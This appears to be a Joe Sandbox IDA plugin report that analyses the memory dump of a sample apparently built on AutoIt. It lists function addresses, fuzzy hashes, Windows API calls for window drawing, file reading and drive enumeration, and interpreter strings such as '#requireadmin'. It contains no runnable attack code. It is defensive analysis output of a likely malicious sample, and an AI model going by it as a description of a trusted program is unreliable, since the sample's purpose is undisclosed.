Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: 20e6fb2e36dd26c2a25ef93964782875d9fe59c08e83a32f280c949d93e5dae3
Instruction ID: 15d0b28d42853d7f209474852952244fa5287a91a44b80c1ff4d90a4a7576765
Opcode Fuzzy Hash: 20e6fb2e36dd26c2a25ef93964782875d9fe59c08e83a32f280c949d93e5dae3
Instruction Fuzzy Hash: A792BC70608345CFD764DF18C490B6ABBE1FF88308F18885DEA8A8B362D775E945DB52

Function 00FEE3B0 Relevance: .5, Instructions: 540COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 813b503753667996cddcea17d79c4ae780bd1f6663ef11a123dd47011ded628d
Instruction ID: 1323076038a3a75616b81ac900e59f73e113cb8d80aa8900a8667d102132c570
Opcode Fuzzy Hash: 813b503753667996cddcea17d79c4ae780bd1f6663ef11a123dd47011ded628d
Instruction Fuzzy Hash: 0622E075D00249CFDB24DF59E480BBAB7F0FF18314F188069D98A9B391E335A985EB91

Function 00FE93F0 Relevance: .5, Instructions: 531COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1715c1f94c2f71e9974c011b436fc474803937606c249eed5e065af8c3688bb
Instruction ID: 16ed0890f5d42fe3146256044c239ea569b94bd4b540809349efffa2fe0743fe
Opcode Fuzzy Hash: d1715c1f94c2f71e9974c011b436fc474803937606c249eed5e065af8c3688bb
Instruction Fuzzy Hash: 0A12BF70A00209DFDF14DFA9D991AEEB7F5FF48300F104569E846E7295EB3AA910DB60

Function 00FEAF50 Relevance: .5, Instructions: 514COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID:
API String ID: 3728558374-0
Opcode ID: f0ba979b0f11adc07d54d2ffd370a915f8fe71d436fa3a44617bcb8a0708fc30
Instruction ID: 3e7bef4cee20fd9c1967b986f679cd4e806f490cb0054726deffaad96bbe4423
Opcode Fuzzy Hash: f0ba979b0f11adc07d54d2ffd370a915f8fe71d436fa3a44617bcb8a0708fc30
Instruction Fuzzy Hash: 6102F170E00109DBDF04DF69D9816AFBBB5FF44300F1480A9E946EB295EB39DA14DB91

Function 010002A4 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction ID: b9621744a2f93a87285969210822ae2bd3933fcb445b8ef28e4b5f561829e2d2
Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction Fuzzy Hash: 0DC160322051970AFB6E463D843453EBEE15F927F171A07ADE5F2CB5E9EE20C168D620

Function 010006D9 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction ID: b17567b2e54758ae55cfe1f58aa052bccef741acdb9eb5393340f52ae8752535
Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction Fuzzy Hash: BEC1713260519709FB6E463D843453EBEE15FA27B170A07ADE5F2CB4E9EF208178D620

Function 00FFFA57 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: d59fb9da3209f98b1814110a9f319aa5ea14c78f382bf75c3b67900fa8919f62
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: A1C1803260509B09DF2D463AC47453EBAA15EA2BB131A077DD5B2CB5F5EF20C57CE620

Function 0103A2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0103A2FE
DeleteObject.GDI32(00000000), ref: 0103A310
DestroyWindow.USER32 ref: 0103A31E
GetDesktopWindow.USER32 ref: 0103A338
GetWindowRect.USER32(00000000), ref: 0103A33F
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0103A480
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0103A490
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0103A4D8
GetClientRect.USER32(00000000,?), ref: 0103A4E4
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0103A51E
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0103A540
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0103A553
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0103A55E
GlobalLock.KERNEL32(00000000), ref: 0103A567
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0103A576
GlobalUnlock.KERNEL32(00000000), ref: 0103A57F
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0103A586
GlobalFree.KERNEL32(00000000), ref: 0103A591
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0103A5A3
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0106D9BC,00000000), ref: 0103A5B9
GlobalFree.KERNEL32(00000000), ref: 0103A5C9
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0103A5EF
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0103A60E
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0103A630
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0103A81D

Strings

DISPLAY, xrefs: 0103A680
, xrefs: 0103A7A3
AutoIt v3, xrefs: 0103A4D0
static, xrefs: 0103A518, 0103A66F

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 73b89e235fb49f748bcb3b5423ab1d5ff29255b9baac6cb636f727b872687558
Instruction ID: d3e9392d373eaa4fc7a7ccc8e48efe704b1e86b81cf8b4f8b803711df32c9518
Opcode Fuzzy Hash: 73b89e235fb49f748bcb3b5423ab1d5ff29255b9baac6cb636f727b872687558
Instruction Fuzzy Hash: 33027E75A00104EFDB14DFA9DD89EAE7BB9FB48310F048158FA95EB2A4C7799D01CB60

Function 0104D285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0104D2DB
GetSysColorBrush.USER32(0000000F), ref: 0104D30C
GetSysColor.USER32(0000000F), ref: 0104D318
SetBkColor.GDI32(?,000000FF), ref: 0104D332
SelectObject.GDI32(?,00000000), ref: 0104D341
InflateRect.USER32(?,000000FF,000000FF), ref: 0104D36C
GetSysColor.USER32(00000010), ref: 0104D374
CreateSolidBrush.GDI32(00000000), ref: 0104D37B
FrameRect.USER32(?,?,00000000), ref: 0104D38A
DeleteObject.GDI32(00000000), ref: 0104D391
InflateRect.USER32(?,000000FE,000000FE), ref: 0104D3DC
FillRect.USER32(?,?,00000000), ref: 0104D40E
GetWindowLongW.USER32(?,000000F0), ref: 0104D439

Part of subcall function 0104D575: GetSysColor.USER32(00000012), ref: 0104D5AE
Part of subcall function 0104D575: SetTextColor.GDI32(?,?), ref: 0104D5B2
Part of subcall function 0104D575: GetSysColorBrush.USER32(0000000F), ref: 0104D5C8
Part of subcall function 0104D575: GetSysColor.USER32(0000000F), ref: 0104D5D3
Part of subcall function 0104D575: GetSysColor.USER32(00000011), ref: 0104D5F0
Part of subcall function 0104D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0104D5FE
Part of subcall function 0104D575: SelectObject.GDI32(?,00000000), ref: 0104D60F
Part of subcall function 0104D575: SetBkColor.GDI32(?,00000000), ref: 0104D618
Part of subcall function 0104D575: SelectObject.GDI32(?,?), ref: 0104D625
Part of subcall function 0104D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0104D644
Part of subcall function 0104D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0104D65B
Part of subcall function 0104D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0104D670
Part of subcall function 0104D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0104D698

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: f426af12e5bb3f7769714093bcb820e75e539818b5ef11d41f6a112c877109f6
Instruction ID: 1fde57b832337dadcc05e43d22de3645da571c560e53f9981637c33747c5d2c1
Opcode Fuzzy Hash: f426af12e5bb3f7769714093bcb820e75e539818b5ef11d41f6a112c877109f6
Instruction Fuzzy Hash: E1919EB1108301FFD7209FA4DC48A6B7BE9FF89325F004A29F9E2961A4C776D944CB52

Function 00FFB8FD Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 00FFB98B
DeleteObject.GDI32(00000000), ref: 00FFB9CD
DeleteObject.GDI32(00000000), ref: 00FFB9D8
DestroyIcon.USER32(00000000), ref: 00FFB9E3
DestroyWindow.USER32(00000000), ref: 00FFB9EE
SendMessageW.USER32(?,00001308,?,00000000), ref: 0105D2AA
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0105D2E3
MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0105D711

Part of subcall function 00FFB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FFB759,?,00000000,?,?,?,?,00FFB72B,00000000,?), ref: 00FFBA58

SendMessageW.USER32 ref: 0105D758
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0105D76F
ImageList_Destroy.COMCTL32(00000000), ref: 0105D785
ImageList_Destroy.COMCTL32(00000000), ref: 0105D790

Strings

0, xrefs: 0105D5A5

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: f392a4144dd10f5214db63664a06a539b9a8813fe31614383ceae68872116345
Instruction ID: 6ef3426444671e2f3c63440006c57cd001e1a2c755e417f98ce04dc3071904c4
Opcode Fuzzy Hash: f392a4144dd10f5214db63664a06a539b9a8813fe31614383ceae68872116345
Instruction Fuzzy Hash: 01129030204205DFDBA1CF98C484BAABBE5FF48315F1445AAFAC9CB662C775E842DB51

Function 01039F50 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 01039F83
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0103A042
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 0103A080
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 0103A092
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 0103A0D8
GetClientRect.USER32(00000000,?), ref: 0103A0E4
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 0103A128
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0103A137
GetStockObject.GDI32(00000011), ref: 0103A147
SelectObject.GDI32(00000000,00000000), ref: 0103A14B
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 0103A15B
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0103A164
DeleteDC.GDI32(00000000), ref: 0103A16D
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0103A19B
SendMessageW.USER32(00000030,00000000,00000001), ref: 0103A1B2
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 0103A1ED
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0103A201
SendMessageW.USER32(00000404,00000001,00000000), ref: 0103A212
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0103A242
GetStockObject.GDI32(00000011), ref: 0103A24D
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 0103A258
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 0103A262

Strings

msctls_progress32, xrefs: 0103A1E3
DISPLAY, xrefs: 0103A12D
static, xrefs: 0103A122, 0103A23C
AutoIt v3, xrefs: 0103A0D0

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 8b9dfbd43fb9551d6a77b3e0220962752bce5333551a540e559e10705318d295
Instruction ID: a56116d43bd5b662e8e3c4189fda5b428702ac1aa99fd48b8656d6a1818e93f0
Opcode Fuzzy Hash: 8b9dfbd43fb9551d6a77b3e0220962752bce5333551a540e559e10705318d295
Instruction Fuzzy Hash: E1A17071B40215BFEB24DBA9DC4AFAE7BA9EB44710F004114F654EB1D4D7B9AD00CB64

Function 0102DBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0102DBD6
GetDriveTypeW.KERNEL32(?,0107DC54,?,\\.\,0107DC00), ref: 0102DCC3
SetErrorMode.KERNEL32(00000000,0107DC54,?,\\.\,0107DC00), ref: 0102DE29

Strings

1394, xrefs: 0102DDA8
\\.\, xrefs: 0102DC2B
RAID, xrefs: 0102DDC4
SAS, xrefs: 0102DDD2
ATAPI, xrefs: 0102DD9A
SSA, xrefs: 0102DDAF
Virtual, xrefs: 0102DDEE
Unknown, xrefs: 0102DCE3, 0102DD8C
SSD, xrefs: 0102DD50
Fibre, xrefs: 0102DDB6
USB, xrefs: 0102DDBD
PhysicalDrive, xrefs: 0102DC67
SATA, xrefs: 0102DDD9
Network, xrefs: 0102DD01
ATA, xrefs: 0102DDA1
FileBackedVirtual, xrefs: 0102DDF5
CDROM, xrefs: 0102DCF7
RAMDisk, xrefs: 0102DCED
Removable, xrefs: 0102DD15
iSCSI, xrefs: 0102DDCB
MMC, xrefs: 0102DDE7
SCSI, xrefs: 0102DD93
Fixed, xrefs: 0102DD0B

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: d98e2d61a458fd5eb42e013dd03544597795f906044785705a0c7ef49d1b2655
Instruction ID: d522256417cdc2ae9f86d7964ed83d9cdfb2d92095ee16e2e7b31bfcc3ccb90b
Opcode Fuzzy Hash: d98e2d61a458fd5eb42e013dd03544597795f906044785705a0c7ef49d1b2655
Instruction Fuzzy Hash: 9751B03020CB66AF8B10FFA6C8A182EB7E0FB94605B10481EF5D79F661DA71DC45DB42

Function 00FECC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00FECC68
__wcsnicmp.LIBCMT ref: 00FECC80
__wcsnicmp.LIBCMT ref: 00FECC98
__wcsnicmp.LIBCMT ref: 00FECCB0
__wcsnicmp.LIBCMT ref: 00FECCC8
__wcsnicmp.LIBCMT ref: 00FECCE0
__wcsnicmp.LIBCMT ref: 00FECCF8
__wcsnicmp.LIBCMT ref: 00FECD0C
__wcsnicmp.LIBCMT ref: 00FECD4D
__wcsnicmp.LIBCMT ref: 00FECD61
__wcsnicmp.LIBCMT ref: 00FECD75
__wcsnicmp.LIBCMT ref: 00FECD89

Strings

#requireadmin, xrefs: 00FECC92
#OnAutoItStartRegister, xrefs: 00FECCAA
#ce, xrefs: 00FECD83
Cannot parse #include, xrefs: 01052FA1
Bad directive syntax error, xrefs: 01052ECB
#comments-end, xrefs: 00FECD6F
#include, xrefs: 00FECCDA
#include-once, xrefs: 00FECCC2
#comments-start, xrefs: 00FECCF2, 00FECD47
#notrayicon, xrefs: 00FECC7A
#cs, xrefs: 00FECD06, 00FECD5B
Unterminated group of comments, xrefs: 01052FB4
#pragma compile, xrefs: 00FECC62

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 2c1b5feed84d732344a4ca179816d9b493c54f18a444f340d9066d678cf4fa76
Instruction ID: 3c5fe836048927b8312a27dd866b722748c9021969743eb6747a3ce4fdcb3a35
Opcode Fuzzy Hash: 2c1b5feed84d732344a4ca179816d9b493c54f18a444f340d9066d678cf4fa76
Instruction Fuzzy Hash: A4812C3164025ABBDB65AF6ADC42FBF3769AF24700F044029FD856A181E771DA02E3D4

Function 0104C6E9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0104C788
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0104C83E
SendMessageW.USER32(?,00001102,00000002,?), ref: 0104C859
SendMessageW.USER32(?,000000F1,?,00000000), ref: 0104CB15

Strings

0, xrefs: 0104C89C

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 2ba241c77521dc90f8fcc6e4d14eb42cbcefa807951d9cd6a85ad79bd0e5e43e
Instruction ID: d81893f73e177cd6ffc6c378dc23c8d9222dac8d498b7cd3771abfea1385dc31
Opcode Fuzzy Hash: 2ba241c77521dc90f8fcc6e4d14eb42cbcefa807951d9cd6a85ad79bd0e5e43e
Instruction Fuzzy Hash: 6CF1CFB1206301ABF7618F28C989BAABFE4FF49354F08056DF6C9D62A1C775C840DB91

Function 0104638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,0107DC00), ref: 01046449

Strings

ISCHECKED, xrefs: 01046659
TABLEFT, xrefs: 010464A7
CHECK, xrefs: 0104668B
HIDEDROPDOWN, xrefs: 01046520
ADDSTRING, xrefs: 01046536
SHOWDROPDOWN, xrefs: 01046500
SETCURRENTSELECTION, xrefs: 010465D6
GETLINECOUNT, xrefs: 010466E4
ISENABLED, xrefs: 0104648C
GETCURRENTLINE, xrefs: 01046704
FINDSTRING, xrefs: 01046596
DELSTRING, xrefs: 01046569
TABRIGHT, xrefs: 010464BD
UNCHECK, xrefs: 010466A1
GETLINE, xrefs: 0104678B
EDITPASTE, xrefs: 0104675B
